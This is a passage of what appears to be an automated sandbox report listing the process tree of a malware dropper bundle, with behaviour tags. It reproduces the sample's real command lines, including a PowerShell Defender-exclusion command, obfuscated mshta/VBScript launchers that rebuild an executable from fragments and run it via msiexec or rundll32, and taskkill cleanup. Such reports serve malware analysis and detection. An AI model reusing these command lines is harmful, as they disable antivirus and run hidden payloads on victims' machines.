  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
  - Adds Run key to start application
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8793946f8,0x7ff879394708,0x7ff879394718
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:8
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:8
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3852 /prefetch:2
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3380 /prefetch:8
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5620 /prefetch:8
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:8
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5304 /prefetch:8
- [depth 4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8793946f8,0x7ff879394708,0x7ff879394718
- [depth 5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,8579713172923436235,9320072428026626032,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
- [depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\569C.exe" -Force
- [depth 4] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 2288
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- [depth 2] C:\Users\Admin\AppData\Local\Temp\5C69.exe
  C:\Users\Admin\AppData\Local\Temp\5C69.exe
- [depth 3] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 236
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- [depth 2] C:\Users\Admin\AppData\Local\Temp\65A2.exe
  C:\Users\Admin\AppData\Local\Temp\65A2.exe
- [depth 3] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7148 -s 240
  - Suspicious use of SetThreadContext
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- [depth 2] C:\Users\Admin\AppData\Local\Temp\6B9E.exe
  C:\Users\Admin\AppData\Local\Temp\6B9E.exe
  - Suspicious use of SetThreadContext
- [depth 3] C:\Users\Admin\AppData\Local\Temp\6B9E.exe
  C:\Users\Admin\AppData\Local\Temp\6B9E.exe
- [depth 1] C:\Windows\System32\WaaSMedicAgent.exe
  C:\Windows\System32\WaaSMedicAgent.exe b7e53dc7f6f9f6d3f8fef6eff7339ba4 4u7jN66aPkqkVsvoBawzOQ.0.1.0.3.0
  - Modifies data under HKEY_USERS
- [depth 1] C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
- [depth 1] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01e3b3e0fa80800c.exe
  Sat01e3b3e0fa80800c.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- [depth 1] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe
  Sat018ad0a25a7faa.exe
  - Executes dropped EXE
- [depth 2] C:\Users\Admin\AppData\Local\Temp\is-9IL7H.tmp\Sat018ad0a25a7faa.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-9IL7H.tmp\Sat018ad0a25a7faa.tmp" /SL5="$30132,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe"
  - Executes dropped EXE
  - Loads dropped DLL
- [depth 1] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01c5002407.exe
  Sat01c5002407.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- [depth 2] C:\ProgramData\6925404.exe
  "C:\ProgramData\6925404.exe"
  - Executes dropped EXE
- [depth 2] C:\ProgramData\4877252.exe
  "C:\ProgramData\4877252.exe"
  - Executes dropped EXE
- [depth 2] C:\ProgramData\7604105.exe
  "C:\ProgramData\7604105.exe"
  - Executes dropped EXE
- [depth 2] C:\ProgramData\8633857.exe
  "C:\ProgramData\8633857.exe"
  - Executes dropped EXE
- [depth 3] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ("C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\ProgramData\8633857.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If """" == """" for %d in ( ""C:\ProgramData\8633857.exe"") do taskkill /im ""%~nXd"" -F " ,0 , TrUe))
- [depth 4] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\ProgramData\8633857.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If "" =="" for %d in ("C:\ProgramData\8633857.exe") do taskkill /im "%~nXd" -F
- [depth 5] C:\Windows\SysWOW64\taskkill.exe
  taskkill /im "8633857.exe" -F
  - Kills process with taskkill
- [depth 5] C:\Users\Admin\AppData\Local\Temp\zrvA.exe
  zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu
- [depth 6] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ("C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\Users\Admin\AppData\Local\Temp\zrvA.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If ""/PqtlfVLLUzTsVT2Ot9MwAu "" == """" for %d in ( ""C:\Users\Admin\AppData\Local\Temp\zrvA.exe"") do taskkill /im ""%~nXd"" -F " ,0 , TrUe))
- [depth 7] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\Users\Admin\AppData\Local\Temp\zrvA.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If "/PqtlfVLLUzTsVT2Ot9MwAu " =="" for %d in ("C:\Users\Admin\AppData\Local\Temp\zrvA.exe") do taskkill /im "%~nXd" -F
- [depth 6] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vBscriPt: closE ( cREATEObject("WsCript.Shell" ). RuN ( "C:\Windows\system32\cmd.exe /c EChO | set /P = ""MZ"" > BXCX3.r &copy /B /y BXCX3.R+ j5IuH.B+ 1QL5Dt.T + CPR97qq.W8m + JuDE.JgD _gHPacAe.0 &stArt msiexec.exe /Y .\_GHPacae.0 " , 0 , tRue ) )
- [depth 7] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c EChO | set /P = "MZ" > BXCX3.r &copy /B /y BXCX3.R+ j5IuH.B+1QL5Dt.T + CPR97qq.W8m+ JuDE.JgD _gHPacAe.0&stArt msiexec.exe /Y .\_GHPacae.0
- [depth 8] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>BXCX3.r"
- [depth 8] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" EChO "
- [depth 8] C:\Windows\SysWOW64\msiexec.exe
  msiexec.exe /Y .\_GHPacae.0
  - Executes dropped EXE
  - Loads dropped DLL
- [depth 1] C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
- [depth 1] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vBScript: ClOsE( cReaTeOBjECt ( "wSCriPt.SHELL"). RUN ( "CMD /Q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe"" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe"") do taskkill -f /Im ""%~NxM"" " , 0, TRue) )
- [depth 2] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF "" =="" for %M In ( "C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe") do taskkill -f /Im "%~NxM"
- [depth 3] C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE
  ..\BBIOhV.Exe -PTptXOWlEYbyb
  - Executes dropped EXE
- [depth 4] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vBScript: ClOsE( cReaTeOBjECt ( "wSCriPt.SHELL"). RUN ( "CMD /Q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE"" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF ""-PTptXOWlEYbyb "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE"") do taskkill -f /Im ""%~NxM"" " , 0, TRue) )
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF "-PTptXOWlEYbyb " =="" for %M In ( "C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE") do taskkill -f /Im "%~NxM"
- [depth 4] C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vbScRiPt: CLoSe (creAtEOBJECt ( "WsCRIPt.sHeLl"). rUn ("cMD /Q /C Echo C:\Users\Admin\AppData\Local\TempNgu> Tqd1uZH.w & ECho | set /p = ""MZ"" > IRPJ4p_.E &CoPy /b /y IRPJ4p_.E+ k1OWwJBF._n + ZiENV9W.9 + TJDT~50N.T+ Q3ePSE6P.B + u0zN.v+ TqD1UZH.W ..\xEULvZFM.BWq & Del /q *& StarT control ..\XEULVZFm.BWq " , 0 , TRUE ) )
  - Blocklisted process makes network request
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of FindShellTrayWindow
- [depth 5] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /Q /C Echo C:\Users\Admin\AppData\Local\TempNgu> Tqd1uZH.w &ECho | set /p = "MZ" > IRPJ4p_.E &CoPy /b /y IRPJ4p_.E+ k1OWwJBF._n +ZiENV9W.9+ TJDT~50N.T+Q3ePSE6P.B+ u0zN.v+ TqD1UZH.W ..\xEULvZFM.BWq &Del /q *& StarT control ..\XEULVZFm.BWq
- [depth 6] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" ECho "
- [depth 6] C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>IRPJ4p_.E"
- [depth 6] C:\Windows\SysWOW64\control.exe
  control ..\XEULVZFm.BWq
- [depth 7] C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\XEULVZFm.BWq
  - Loads dropped DLL
- [depth 8] C:\Windows\system32\RunDll32.exe
  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\XEULVZFm.BWq
- [depth 9] C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\XEULVZFm.BWq
- [depth 3] C:\Windows\SysWOW64\taskkill.exe
  taskkill -f /Im "Sat01519886887.exe"
  - Kills process with taskkill
- [depth 1] C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe" /SILENT
  - Executes dropped EXE
- [depth 2] C:\Users\Admin\AppData\Local\Temp\is-QKESC.tmp\Sat018ad0a25a7faa.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-QKESC.tmp\Sat018ad0a25a7faa.tmp" /SL5="$2020E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe" /SILENT
- [depth 3] C:\Users\Admin\AppData\Local\Temp\is-6BUFL.tmp\postback.exe
  "C:\Users\Admin\AppData\Local\Temp\is-6BUFL.tmp\postback.exe" ss1
- [depth 1] C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  - Suspicious use of AdjustPrivilegeToken
- [depth 2] C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
- [depth 2] C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
- [depth 1] C:\Windows\system32\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
- [depth 2] C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- [depth 3] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 448
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5236 -ip 5236
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5588 -ip 5588
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 7096 -ip 7096
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4692 -ip 4692
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4704 -ip 4704
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3160 -ip 3160
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5240 -ip 5240
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3336 -ip 3336
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 360 -p 6628 -ip 6628
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5924 -ip 5924
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4788 -ip 4788
- [depth 1] C:\Windows\system32\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
- [depth 2] C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5596 -ip 5596
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 440 -p 4704 -ip 4704
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6408 -ip 6408
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1348 -ip 1348
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5608 -ip 5608
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4172 -ip 4172
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5424 -ip 5424
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1064 -ip 1064
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\System32\WaaSMedicAgent.exe
  C:\Windows\System32\WaaSMedicAgent.exe b7e53dc7f6f9f6d3f8fef6eff7339ba4 4u7jN66aPkqkVsvoBawzOQ.0.1.0.3.0
  - Modifies data under HKEY_USERS
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7724 -ip 7724
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 7696 -ip 7696
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 8024 -ip 8024
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7560 -ip 7560
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 8048 -ip 8048
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5996 -ip 5996
  - Suspicious use of NtCreateProcessExOtherParentProcess
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 4740 -ip 4740
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Executes dropped EXE
- [depth 1] C:\Windows\SysWOW64\WerFault.exe
